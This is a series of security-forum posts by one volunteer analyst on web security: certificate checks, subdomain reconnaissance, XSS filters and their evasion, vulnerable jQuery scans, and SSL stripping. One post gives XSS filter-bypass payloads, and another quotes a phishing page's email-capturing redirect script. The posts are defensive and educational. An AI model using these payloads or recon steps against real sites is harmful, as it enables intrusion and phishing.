Author Topic: Tests and other Media topics  (Read 296274 times)

0 Members and 2 Guests are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #810 on: July 10, 2020, 01:25:02 PM »
Mozilla now shortens lifespan of TLS certificates also to enhance https security.
A better way to do this is to use DANE for web:
Read: https://cs.gmu.edu/~eoster/doc/2015-08-US-Telecom-DANE.pdf

Check with DANE SMPT Validator (random example): https://dane.sys4.de/smtp/security.nl
or through https://www.huque.com/bin/danecheck  or  https://check.sidnlabs.nl/dane/

polonus
« Last Edit: July 10, 2020, 11:10:21 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #811 on: July 12, 2020, 06:11:59 PM »
Privacy error on page. Nontrusted Certificate F-grade, see full report here:
https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=myavcs.com
opening up to  -https://www.disasterrecoverycenter.org  also NON TRUSTED and expired!
This website has a T-grade, which is even worse. Advanced iFrame functions there.

You can report similar UNTRUSTED websites through the suspicious site reporter extension in the browser.

Here we can read about exploitable PHP functions and how they have been troubling us for the last thirty years and more:
https://stackoverflow.com/questions/3115559/exploitable-php-functions
and another discussion here on appsec:
https://security.stackexchange.com/questions/1382/disable-insecure-dangerous-php-functions

pol

« Last Edit: July 13, 2020, 12:14:48 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #812 on: July 21, 2020, 03:25:01 PM »
Testing for php on a particular PHISHING page where we know it has Endurance Page Cache php translation to html as scan for Endurance Page Cache html may help to reveal it in the code (regular expression mail-code etc.),
example checking on -https://cndherbals.com/endurance-page-cache.html
Quote
  type="text/javascript" >
function validateEmail(email) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "-https://www.yuxuans.cn/wp-admin/network/dooo/quota/?email="+hash;
}
also uses MonsterInsights on Google Analytics,

polonus
« Last Edit: July 21, 2020, 03:28:50 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #813 on: July 22, 2020, 01:12:03 PM »
Domain names and subdomain enumeration...Used are dns en WHOIS protocol methods.
Re: https://dnsspy.io/scan
Also for sub-domains: https://securitytrails.com/blog/subdomain-scanner-find-subdomains.

Automatically generated at places where you could register.
Via zone-owner, authorities here are very restrictive because of risks.
Through DNS queries (example Cisco Umbrella (OpenDNS)
Via Certificate Transparency:  https://crt.sh/.
Through scans at shodan & censys etc.
Through multi-threaded scripts, Clone DNS-root-directories to see what is still available (free).
But these are rate-limited against obvious abuse.

Google is your best friend: Google for site:example.com of delivers info on subsites op; just try for instance site:wordpress.com or site:moonfruit.com. The latter has many a phishing site (eg with site:moonfruit.com owa).
Such queries could be combined with Google dorks e.g. for specific Wordpress versions and/or used themes/ plugins.
Info credits go to: Erik van Straten.

Look at resources like: RobTex.com

https://pentest-tools.com/information-gathering/find-subdomains-of-domain#

Also try:  https://www.ultratools.com/

There are many (semi-)public DNS servers that gather data on DNS lookups.
Such data is being used to look up sub-domains and hostnames per IP.
Resources can be public or on demand.
Whenever you use a "secret"hostname one should check what DNS servers will get your requests.
Do not use public name servers and/or on clients.

Then we have AFXR unrestricted open to offenders, to get to all of the zone.
This should be limited to trusted name servers.
Check all name servers for a particular domain. open to offenders, all of the zone can be found.
This should be limited to trusted name servers. Check all name servers of that particular domain.
Has a zone file been entered online?

dig ANY. De DNS server for that domain has all known domains from cache.

An open root directory on a web server can also lead to disclosure.

Also a DNS server or interface of control panel (etc.) could be hacked.

Also look for test-servers. Often these are not being maintained.

The plugin update check for WordPress is spurious, it cannot be trusted fully.
Using back up plugins check plug-ins are not available online.
Remove disable plugins and all remaining files.. (info credits anonymous resources)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)


Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #814 on: July 24, 2020, 12:35:53 PM »
What to do when we have a domain like: -http://ww12.d-analyse.com/  for instance?
This is a parking logic - parking crew monetizing website.

Hosted @, see:https://www.shodan.io/host/54.72.9.115
on -ec2-54-72-9-115.eu-west-1.compute.amazonaws.com

Is this website a legit website? This because the domain format is not a valid one, e.g. ww12.etc.
Can we say this a form of van cert. abuse?

Parking-monetizers (in the cloud) can so avoid detection.

Somewhat higher up in that hosting domain we find:
https://dnsspy.io/scan/eu-west-1.compute.amazonaws.com  (info credits go to: luntrus)

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #815 on: August 07, 2020, 09:37:44 PM »
XSS Filters a cure against DOM-XSS exploits.
Example code
Quote
*/
require ("mocha");
expect = require (/ expect.js');
xssFilters = require (''.../src/XSS-filters');
testutils = require ('./utils.js');
/require ('./unit/private-xss.filters.js');
require ('./unit/xss.filters.js');
source Yahoo Archives.
- See owasp.org XSS Filter Evasion Sheet.

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #816 on: August 08, 2020, 09:20:17 PM »
But nothing comes guaranteed in webcode development and with script security,
so one can even evade such XSS Filters:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Already convinced this will be an ongoing battle i.m.h.o.

For instance abuse scans worked with issues from a XSS Bypass Filter list,
for instance add: <script/src=data:,alert()> or e.g. %3Cscript/src=data:,alert(retire.js)%3E
(only for legit pentesters that were granted exclusive written permisson from the owner).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
« Last Edit: August 09, 2020, 09:48:13 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #817 on: August 09, 2020, 11:10:11 AM »
L.S.

No more SQL injections with WASPlang?

* Sql injections are to be avoided using prepared statements with parameters
Sanitizing is felt to be for dummies.
However, considering the following  (for what it is worth ;)).

Little footprint, assembly line makes it harder for XSS attacks and SQL injection to succeed,
but only when code neatly sanitized *

Features

encourages immutability
immutable c-strings, memory manipulation, global variables, imported functions, 1st class functions
optional standard library runtime
functions with inline web assembly
test framework support
easy project dependency management
self hosting

Source: https://github.com/wasplang/wasp

Simplified parser code for configuring WSON (like JSON but then for WASPlang),
see: https://github.com/wasp-lang/wasp/issues/18

Also read: https://github.com/renjithgr/starred-repos & for sanitizing:
https://drupal.stackexchange.com/questions/1967/what-does-sanitized-mean-in-api-documentation

And to make this circle discussion go round again:
https://api.drupal.org/api/drupal/includes%21common.inc/function/filter_xss/7.x (see warnings there).

Info credits dehondgaatlatijddeaud & #sockpuppet & luntrus

polonus (volunteer 3rd party cold recon website securety analyst and website error-hunter)
« Last Edit: August 09, 2020, 12:20:43 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #818 on: August 10, 2020, 10:28:15 AM »
DOM-XSS exploits are just part of the story.
Pentesters and researchers work preferably from combined sec lists like:
https://github.com/danielmiessler/SecLists

So for instance analyse XSS-DOM sinks and sources -> https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html
with weaknesses (medium and low vulnerabilities) through retirable jQuery libraries:

Many developers use  Retire.JS (developed by Erlend Oftedal), also found online as:
https://retire.insecurity.today/  (Retire.JS can also be used as extension inside the browser).

Know that some libraries has reached EOL for quite some time, read:
https://github.com/jquery/jquery.com/issues/162#issuecomment-298656430

Only vulnerable in the case that certain functions are being called, so better to upgrade that particular library.

In that code there may be a weakness like s.iframe Src+,
but it could be src already before taht has been validated properly. 
(my info sources; luntrus & not me)

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #819 on: August 10, 2020, 12:05:46 PM »
Why the above information urges us to scan for such exploitable website code?

Let's go over vulnerable jQuery code from a site that is launching heodo malware and emotet malcode:
https://urlhaus.abuse.ch/url/428165/

Word Press scan shows 5 security issues in Word Press CMS.
Outdated plug-ins like header-footer-elementor 1.4.1 and elementor 2.9.7
User enumeration not set to disabled. Directory listing /wp-content/uploads/   is left as:  enabled

Detected as vulnerable jQuery library to be retired, see: https://retire.insecurity.today/#!/scan/ac83b63cdec87cf9d917d6cb12995a5df8c57a639e8063305f2e5f6f76c546f8

Results from scanning URL: -https://earnquick.co.uk/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Number of sources found: 41
Number of sinks found: 17

Sources: .top  .innerHTML  [name=  location.  .top,  .opener  .name=  .name&  .name,  .parent(  .open( 
Sinks: value=  href= data (g.data)  .data  data=  .write(  value  src= 

Site not flagged by DShield    CLEAN
AlienVault OTX      CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

polonus (volunteer 3rd part cold recon website security-analyst and website error-hunter)
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #820 on: August 11, 2020, 07:23:29 PM »
Check a website domain for hsts-preload inclusion: hstspreload.org

Site should be set to be in a certain ruleset. already available in the browser.
Re: https://trac.torproject.org/projects/tor/ticket/10424
Read -> http://www.thoughtcrime.org/software/sslstrip/

Why could this be important on tor to avoid certain recent MIM attacks?
Re: https://scotthelme.co.uk/hsts-preload-test/

Read: https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac

Tor will protect your identity not your data going over the exit node.

This hacker still seems to have owned 10% of existing exit nodes, hence mainly interested in bitcoin exit nodes.

We can assume his activities will not be taken lightly by fellow cybercrime colleages.  :D

See that https everywhere even as coming built-in with tor won't always protect the end-user against downgrading attacks.

polonus
« Last Edit: August 11, 2020, 08:06:35 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 32620
  • malware fighter
Re: Tests and other Media topics
« Reply #821 on: August 11, 2020, 10:17:41 PM »
The first person that spoke about such SSL downgrading attack like SSL-stripping,
was a researcher by the name of Moxie Marlinspike.

There are three ways to perform such SSL stripping attack:
1. Using a Proxy Server;
2. Via ARP Spoofing;
3. Using  an insecure Hotspot

Also a 4th, I found up. Using a particular scan service (info credits: luntrus)
Example XSS-DOM scan: Results from scanning URL: -http://ad.nl
Number of sources found: 2
Number of sinks found: 421 (same results as with -https://ad.nl (random example)

Ways to protect against this is to enable HTTPS on pages of your website,
implement HSTS policy, as we discussed above, the browser won't open a site
unless the site uses HTTPS.  (info credits Comodo's SSL).

Mind that Mainland China now blocks https-traffic using TLS 1.3 & ESNI (known as encrypted server name indication),
read: https://geneva.cs.umd.edu/posts/china-censors-esni/esni/  &   https://gfw.report/blog/gfw_esni_blocking/en/

To test this - To perform this test, go and visit here: https://www.cloudflare.com/ssl/encrypted-sni/
and then click the orange button for “Check My Browser”. Just a moment later you  will see the results.

Chrome does not support ESNI yet at this moment. We can forsee it being rolled out like DoH.
As some schools would not like seeing their filtering software not functioning properly because of this.
So there are still some hooks, but different from interfering with Big Firewall surveillance measurements,
 as mentioned above.  ;)

Enjoy, my good friends, enjoy.

polonus
« Last Edit: August 11, 2020, 11:28:01 PM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!